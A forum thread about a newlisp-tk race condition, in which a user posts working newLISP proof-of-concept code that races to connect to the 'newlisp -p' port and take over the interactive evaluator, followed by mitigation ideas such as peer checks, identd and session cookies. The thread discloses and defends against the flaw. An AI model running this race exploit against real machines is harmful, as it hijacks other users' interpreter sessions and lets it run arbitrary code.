newlisp -p security problem

Dmi
Posts: 408
Joined: Sat Jun 04, 2005 4:16 pm
Location: Russia

newlisp -p security problem

Post by Dmi »

Try to run the following code:

; keep connecting until the listener on the local newlisp-tk port accepts us
(set 'host "127.0.0.1" 'port 64001)
(do-until socket
  (set 'socket (net-connect host port)))
; if a connection was accepted, show the greeting and relay typed lines to it
(if (and socket (net-receive socket 'str 512))
  (begin
    (print "connected> " str)
    (do-while (net-send socket (append (read-line) "\n"))
      (sleep 1)
      (while (!= (net-peek socket) 0)
        (begin
          (net-receive socket 'str 512)
          (print "got: " str)))
      (print "eval: "))))
(exit)

While it is running, try to start newlisp-tk on the same host.
If the program above exits silently, try again several times.
If the program gives the "eval:" prompt, then you have gained the "newlisp -p" instance started by newlisp-tk:
Try writing lisp expressions...
And check the newlisp-tk window - it sucks now.

I can gain a shell about 1 in 3-5 tries...

Problem analysis:
When newlisp-tk starts, it runs newlisp -p 64001, then tries to connect to it.
There is some time between newlisp starting to listen and newlisp-tk sending a connect to it.
A quite fast malicious program can (statistically) win the race with newlisp-tk.

I think this isn't good... And... it is remotely exploitable too!
I think this functionality must have strict user authorization (but not by plain passwords ;-). Possibly, using a randomly generated cookie, known by newlisp and its client (like the X11 magic cookie), will be sufficient.

But... I think domain sockets would be more useful ;-)
WBR, Dmi

statik
Posts: 58
Joined: Thu Apr 14, 2005 1:12 am

Post by statik »

Good call. I'm not so hot on the cookie idea though... That's just me.
-statik

Dmi
Posts: 408
Joined: Sat Jun 04, 2005 4:16 pm
Location: Russia

workarounds

Post by Dmi »

As usual, Lutz gives a good trick :-)

When newlisp -p is started, it begins to interpret the code only after an incoming connection is received. So
(net-peer (first (net-sessions)))
will always return the interactive client's ip/port, which we can then check.

This is the code for local identd-based checking:

(load "ident.lsp")
(IDENT:auth-local)

The ident client context is available here: http://en.feautec.pp.ru/SiteNews/ContextIDENT
... and you need a running identd, of course.

And this is possible code for session-cookie auth:

(print "enter session cookie: ")
(if (!= (read-line) "session cookie")  ;-)
  (begin
    (println "session cookie not entered!")
    (exit)))

To use similar code you need to save it in a file (say, "netinit.lsp") and then start
$ newlisp -p 12345 netinit.lsp
WBR, Dmi
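The cookie scheme outlined above, as an added Python example that is not code from this thread or from newLISP: the listener writes a random cookie to an owner-only file (as X11 does with its magic cookie), accepts only a loopback peer (the net-peer check), and refuses any client whose first line does not match. The file path, port and client are constructed for the demo.

```python
import hmac
import os
import secrets
import socket
import tempfile
import threading

def write_cookie(path):
    """Generate a random session cookie and store it in a file that only the
    owner can read (constructed demo, not newlisp-tk's own mechanism)."""
    cookie = secrets.token_hex(16)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(cookie)
    return cookie

def check_client(conn, cookie):
    """The client's first line must equal the cookie; compare in constant time."""
    line = conn.makefile("rb").readline(256)
    return hmac.compare_digest(line.rstrip(b"\r\n"), cookie.encode())

def run_session(cookie, presented):
    """Loopback listener plus one client thread that presents `presented`.
    The evaluator is offered only if the peer is loopback AND the cookie matches."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
    srv.listen(1)
    port = srv.getsockname()[1]

    def client():
        with socket.create_connection(("127.0.0.1", port)) as c:
            c.sendall(presented.encode() + b"\n")
            c.recv(64)                  # read the verdict, then hang up

    t = threading.Thread(target=client)
    t.start()
    conn, addr = srv.accept()
    with conn:
        # addr[0] is what net-peer would report for the first session
        granted = addr[0] == "127.0.0.1" and check_client(conn, cookie)
        conn.sendall(b"eval: " if granted else b"denied\n")
    t.join()
    srv.close()
    return granted

def demo():
    """Run the legitimate client and a guessing client against the same cookie."""
    path = os.path.join(tempfile.mkdtemp(), "cookie")
    cookie = write_cookie(path)
    return run_session(cookie, cookie), run_session(cookie, "not-the-cookie")
```

A process racing the real client still gets a connection, but without the 0600-protected cookie it only ever sees "denied".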

newdep
Posts: 2038
Joined: Mon Feb 23, 2004 7:40 pm
Location: Netherlands

Post by newdep »

Hello Dmi,

That ident.lsp is a nice one, great job...

Regards, Norman.
-- (define? (Cornflakes))
